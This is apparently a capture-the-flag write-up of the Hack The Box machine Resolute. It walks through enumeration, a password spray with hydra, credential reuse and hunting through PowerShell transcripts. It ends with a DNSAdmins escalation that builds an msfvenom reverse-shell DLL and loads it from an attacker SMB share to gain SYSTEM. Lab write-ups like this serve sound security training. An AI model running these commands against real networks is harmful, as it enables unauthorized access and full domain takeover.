Quick Summary
→ Resolute run as medium machine but an easy box’ in the first phase you easily find the users of the box and 1 password by using enum4linux. I run hydra to bruteforce the users using 1 password and easily got right creds with melanie. I use the creds to get with evil-winrm and got the user.txt. The root part was gave me a little bit headache cause’ there was Anti-Virus inside the machine and I always disconnected when I transfer a file like nc.exe or winPEAS.exe for privilege escalation. As my enumeration there was another user ryan which his password is hidden in the directory. Then after I found it’ I switch to ryan from user melanie. When doing enumeration i found that ryan is part of DNSAdmins that I can abuse it by adding malicious DLL in the serverplugin. Using impacket-smbserver i can load my dll file to machine. Restarting the dns service then I will able to execute my dll as administrator.
Penetration Testing Methodologies
Network Scanning
→ Nmap scan
→ discover open ports and what services are running
Enumeration
→ run enum4linux gives some usernames and 1 password which can be use that later
Post - Exploitation
→ with Hydra I brute force all the usernames with only 1 password, the password is right belong to melanie
→ using Evil-WinRM to login as melanie and got the user.txt
Exploitation
→ enumerating the file directory there was another user ryan
→ using ls -hidden we see a file which contains juicy information
→ by reading the .txt file I got the password of ryan then switch user.
Privilege Escalation
→ create a malicious dll file with msfvenom
→ load my dll file with impacket-smbserver
→ running my meterpreter session
→ stop and start dns service
→ finally I got the administrator and root.txt
Network Scanning
Walkthrough
→ I always begin at NMAP to look on the services what is running. I always use
- -sV ⇒ Probe open ports to determine service/version info
- -sC ⇒ equivalent to —script=default
- -A ⇒ Agressive scan
- -oN ⇒ to save our scan results to a text file
nmap -sV -sC -A 10.10.10.169 -oN nmap-Resolute
|
# bash
root in htb/boxes/Resolute
❯ nmap -sV -sC -A -oN nmap-Resolute 10.10.10.169
Starting Nmap 7.80 ( https:
WARNING: RST from 10.10.10.169 port 53 -- is this port really open?
WARNING: RST from 10.10.10.169 port 53 -- is this port really open?
Nmap scan report for 10.10.10.169
Host is up (0.26s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-30 23:11:35Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https:
SF-Port53-TCP:V=7.80%I=7%D=5/31%Time=5ED2E596%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/31%OT=53%CT=1%CU=35791%PV=Y%DS=2%DC=T%G=Y%TM=5ED2E64
OS:6%P=x86_64-pc-linux-gnu)SEQ(SP=F9%GCD=4%ISR=109%TI=RD%CI=I%II=I%TS=8)SEQ
OS:(SP=102%GCD=1%ISR=104%TI=I%CI=I%II=I%SS=O%TS=A)OPS(O1=%O2=%O3=M54DNW8NNT
OS:11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST11)WIN(W1=0%W2=0%W3=2000%W4=20
OS:00%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%
OS:DF=Y%T=80%S=Z%A=S+%F=AR%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=
OS:0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S
OS:=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R
OS:=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=
OS:AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%
OS:RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h31m01s, deviation: 4h02m30s, median: 11m00s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2020-05-30T16:12:18-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-05-30T23:12:22
|_ start_date: 2020-05-30T22:15:46
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 210.01 ms 10.10.14.1
2 217.91 ms 10.10.10.169
OS and Service detection performed. Please report any incorrect results at https:
# Nmap done at Sun May 31 07:03:34 2020 -- 1 IP address (1 host up) scanned in 216.34 seconds
root in htb/boxes/Resolute took 2m8s
❯
|
We’ve got a lot of open ports. but the interesting was the port :
445(smb), 53(dns), 88(kerberos) and 5985(WinRM).
Enumeration
Enum4linux
to enumerate some juicy information to box, i use enum4linux so let’s see :
root in htb/boxes/Resolute
❯ enum4linux -o -U -G -S 10.10.10.169
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun May 31 08:06:03 2020
==========================
| Target Information |
==========================
Target ........... 10.10.10.169
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 10.10.10.169 |
====================================================
|
As you can see here there’s a lot of users but only 1 password Welcome123! and it use to user marko
=============================
| Users on 10.10.10.169 |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)
[1]+ Stopped enum4linux -o -U -G -S 10.10.10.169
root in htb/boxes/Resolute took 2m4s
❯
|
as you can see in this line there was a lot of username but only 1 password that belong to marko
# bash
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
|
Post - Exploitation
Evil-WinRM
I login it with evil-winrm but it failed ! so, i decided to use hydra and save all the usernames on a text file and bruteforce it with only 1 password :
# bash
root in htb/boxes/Resolute
❯ hydra -t 1 -V -f -L users.txt -p "Welcome123!" 10.10.10.169 smb
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https:
[DATA] max 1 task per 1 server, overall 1 task, 24 login tries (l:24/p:1), ~24 tries per task
[DATA] attacking smb:
[ATTEMPT] target 10.10.10.169 - login "abigail" - pass "Welcome123!" - 1 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "angela" - pass "Welcome123!" - 2 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "annette" - pass "Welcome123!" - 3 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "annika" - pass "Welcome123!" - 4 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "claire" - pass "Welcome123!" - 5 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "claude" - pass "Welcome123!" - 6 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "felicia" - pass "Welcome123!" - 7 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "fred" - pass "Welcome123!" - 8 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "gustavo" - pass "Welcome123!" - 9 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "Guest" - pass "Welcome123!" - 10 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "marcus" - pass "Welcome123!" - 11 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "marko" - pass "Welcome123!" - 12 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "melanie" - pass "Welcome123!" - 13 of 24 [child 0] (0/0)
[445][smb] host: 10.10.10.169 login: melanie password: Welcome123!
[STATUS] attack finished for 10.10.10.169 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-31 08:10:04
root in htb/boxes/Resolute took 8s
❯
|
looks easy right ? The password is belong to user melanie now using Evil-WinRM i will try to login it again.
# bash
root in evil-winrm on master via 💎 v2.7.0
❯ ./evil-winrm.rb -i 10.10.10.169 -u melanie -p Welcome123!
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> whoami
megabank\melanie
*Evil-WinRM* PS C:\Users\melanie\Documents>
|
This one of the easiest user part I experienced, now let’s grab the user.txt then move to privilege escalation.
# bash
*Evil-WinRM* PS C:\Users\melanie\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\melanie\Desktop> Get-Content "user.txt" | Measure-Object -Character -Word
Lines Words Characters Property
----- ----- ---------- --------
1 32
*Evil-WinRM* PS C:\Users\melanie\Desktop>
|
Exploitation
Transfer file with SAMBA
the enumeration starts again, i try to transfer first winPEAS.exe it is similar to LinEnum.sh for Linux kernel, it helps penetration testers to find some useful info that they can use for privilege escalation so first i setup my smb configuration.
[global]
workgroup = WORKGROUP
server string - Samba Server %v
netbios name = Payas0
security = user
map to guest = bad user
name to resolve order = bcast host
dns proxy = no
bind interfaces only = yes
[medz]
path = /root/htb/boxes/Resolute/
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody
|
then start service :
root in htb/boxes/Resolute
❯ smbd service restart
|
now copy the winPEAS.exe with samba
# bash
*Evil-WinRM* PS C:\Users\melanie\Documents> copy \\10.10.14.187\medz\winPEAS.exe
|
but this one failed me. The machine has a Anti-virus it always disconnect me when I try to transfer a file like nc.exe or winPEAS so let’s do another thing’ enumerate the directories.
Hidden directories
# bash
*Evil-WinRM* PS C:\Users\melanie\Documents> cd /
*Evil-WinRM* PS C:\> ls -hidden
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 5/30/2020 3:15 PM 402653184 pagefile.sys
*Evil-WinRM* PS C:\>
|
The PSTranscripts is very interesting because that is not a default file of a windows. so looking inside of that folder :
# bash
*Evil-WinRM* PS C:\> cd PSTranscripts
*Evil-WinRM* PS C:\PSTranscripts> dir
*Evil-WinRM* PS C:\PSTranscripts> ls -hidden
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
*Evil-WinRM* PS C:\PSTranscripts>
|
dir command will not show what’s really inside of the folder so I use ls -hidden to show the hidden files. and there’s another folder 20191203
# bash
*Evil-WinRM* PS C:\PSTranscripts> cd 20191203
*Evil-WinRM* PS C:\PSTranscripts\20191203> ls -hidden
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
*Evil-WinRM* PS C:\PSTranscripts\20191203>
|
very interesting ! let’s see what’s inside of that text file.
# bash
*Evil-WinRM* PS C:\PSTranscripts\20191203> more PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
*Evil-WinRM* PS C:\PSTranscripts\20191203>
|
looking at this I got another user ryan and his possible password Serv3r4Admin4cc123!
# bash
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
|
Now from melanie i switch to user ryan and starts the enumeration again.
# bash
root in evil-winrm on master via 💎 v2.7.0
❯ ./evil-winrm.rb -i 10.10.10.169 -u ryan -p 'Serv3r4Admin4cc123!' -e . -s .
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents>
*Evil-WinRM* PS C:\Users\ryan\Documents>
|
Privilege Escalation
Abusing DNSAdmins privilege for escalation in Active Directory
Now let’s start to enumerate it again i checked it with whoami /all
# bash
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\ryan\Documents>
|
looking at this line’ ryan is part of DNSAdmin Group. This privilege is prone to privilege escation vulnerabilty which allows any user inside this grupo to make the DNS service load an arbitrary DLL correctly constructed.
# bash
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
|
with this help of this article and this one we can get the administrator from DNS
Creating malicious DLL
we know that the machine’ have anti-virus so I can’t load a malicious file inside to get a reverse shell. so I tried to use impacket-smbserver to load my dll file from my operating system and bypass the av protection. so first I created a dll file with msfvenom
# bash
root in htb/boxes/Resolute
❯ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.187 LPORT=9001 -a x64 -f dll > main.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 5120 bytes
root in htb/boxes/Resolute 12s
❯
|
Next i setup my impacket-smbserver in the path where my dll is loaded .
# bash
root in htb/boxes/Resolute
❯ python3 /usr/share/doc/python3-impacket/examples/smbserver.py SHARE /root/htb/boxes/Resolute
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
|
Setup Impacket-smbserver
next is to load my dll file in the entry serverlevelplugindll in the box :
# bash
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd /config /serverlevelplugindll \\10.10.14.187\SHARE\main.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\Documents>
|
to make sure that i successfully connect it we can checked it with this command :
# bash
*Evil-WinRM* PS C:\Users\ryan\Documents> dir \\10.10.14.187\SHARE
Directory: \\10.10.14.187\SHARE
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/30/2020 4:36 PM 12 password.txt
-a---- 5/31/2020 5:13 AM 5120 main.dll
-a---- 5/30/2020 4:03 PM 3512 nmap-Resolute
-a---- 5/30/2020 4:32 PM 154 users.txt
-a---- 5/30/2020 7:51 PM 59392 nc.exe
-a---- 5/30/2020 5:18 PM 241664 winPEAS.exe
*Evil-WinRM* PS C:\Users\ryan\Documents>
|
Success ! the machine has connected with my operating system as they can view my files to the path where i set my SHARE my impacket-smbserver is also responding.
# bash
root in htb/boxes/Resolute
❯ python3 /usr/share/doc/python3-impacket/examples/smbserver.py SHARE /root/htb/boxes/Resolute
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,59611)
[*] AUTHENTICATE_MESSAGE (\,RESOLUTE)
[*] User RESOLUTE\ authenticated successfully
[*] :::00::4141414141414141
[*] Disconnecting Share(1:SHARE)
[*] Handle: 'ConnectionResetError' object is not subscriptable
[*] Closing down connection (10.10.10.169,59611)
[*] Remaining connections []
[*] Incoming connection (10.10.10.169,59760)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:4141414141414141:6bf4545d80d2f13607b0c9d3f91bd604:010100000000000080adb2044837d601ec836f15824f4098000000000100100078005700710051006a0067004a004f000300100078005700710051006a0067004a004f00020010006b00540075006600480053004f006c00040010006b00540075006600480053004f006c000700080080adb2044837d60106000400020000000800300030000000000000000000000000400000318efa794fd558b74c119e534800bb85deca03c294098a118af41f41a36559c40a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100380037000000000000000000
[*] Disconnecting Share(1:SHARE)
[*] Handle: 'ConnectionResetError' object is not subscriptable
[*] Closing down connection (10.10.10.169,59760)
[*] Remaining connections []
|
Now let’s run metasploit with meterpreter sessions and start listening .
Setup Meterpreter session
root in htb/boxes/Resolute
❯ msfconsole
[!] The following modules could not be loaded!../
[!] /root/.msf4/modules/exploits/cgi/webapps/wordpress_userpro.rb
[!] Please see /root/.msf4/logs/framework.log for details.
.;lxO0KXXXK0Oxl:.
,o0WMMMMMMMMMMMMMMMMMMKd,
'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
:KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
.KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
lWMMMMMMMMMMMXd:.. ..;dKMMMMMMMMMMMMo
xMMMMMMMMMMWd. .oNMMMMMMMMMMk
oMMMMMMMMMMx. dMMMMMMMMMMx
.WMMMMMMMMM: :MMMMMMMMMM,
xMMMMMMMMMo lMMMMMMMMMO
NMMMMMMMMW ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW. ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd ,0MMMMMMMMMMK;
.WMMMMMMMMMc 'OMMMMMM0,
lMMMMMMMMMMk. .kMMO'
dMMMMMMMMMMWd' ..
cWMMMMMMMMMMMNxc'. ##########
.0MMMMMMMMMMMMMMMMWc #+# #+#
;0MMMMMMMMMMMMMMMo. +:+
.dNMMMMMMMMMMMMo +#++:++#+
'oOWMMMMMMMMo +:+
.,cdkO0K; :+: :+:
:::::::+:
Metasploit
=[ metasploit v5.0.87-dev ]
+ -- --=[ 2006 exploits - 1096 auxiliary - 343 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: When in a module, use back to go back to the top level prompt
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 10.10.14.187
LHOST => 10.10.14.187
msf5 exploit(multi/handler) > set LPORT 9001
LPORT => 9001
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.187:9001
|
all things now are setup. so now I will do the exploitation’ i will load again my dll file.
# bash
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd /config /serverlevelplugindll \\10.10.14.187\SHARE\main.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\Documents>
|
so based on the article I will stop and start the dns services, this will invoke my dll file and captured meterpreter shell.
# bash
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents>
|
then start dns service
# bash
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 1144
FLAGS :
*Evil-WinRM* PS C:\Users\ryan\Documents>
|
and finally got a Administrator shell !
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.187:9001
[*] Sending stage (201283 bytes) to 10.10.10.169
[*] Meterpreter session 1 opened (10.10.14.187:9001 -> 10.10.10.169:59761) at 2020-05-31 20:35:54 +0800
meterpreter >
|
meterpreter > sysinfo
Computer : RESOLUTE
OS : Windows 2016+ (10.0 Build 14393).
Architecture : x64
System Language : en_US
Domain : MEGABANK
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
|
Get the root.txt
So let’s pop up a shell and get the root.txt :
# bash
meterpreter > shell
Process 1596 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
|
# bash
C:\Users>cd Administrator/Desktop
cd Administrator/Desktop
C:\Users\Administrator\Desktop>dir
